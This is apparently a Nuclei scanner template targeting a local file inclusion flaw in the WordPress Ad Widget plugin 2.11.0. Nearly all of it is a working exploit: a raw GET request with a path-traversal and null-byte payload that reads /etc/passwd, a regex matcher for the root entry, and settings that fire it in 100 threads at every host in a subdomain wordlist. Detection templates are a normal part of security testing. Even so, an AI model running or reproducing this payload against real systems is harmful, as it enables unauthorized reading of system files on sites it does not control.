id: ad-widget-lfi
info:
  name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
  author: 0x_Akoko
  severity: high
  description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
  reference:
    - https://cxsecurity.com/issue/WLB-2017100084
    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
  tags: wordpress,wp-plugin,lfi
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
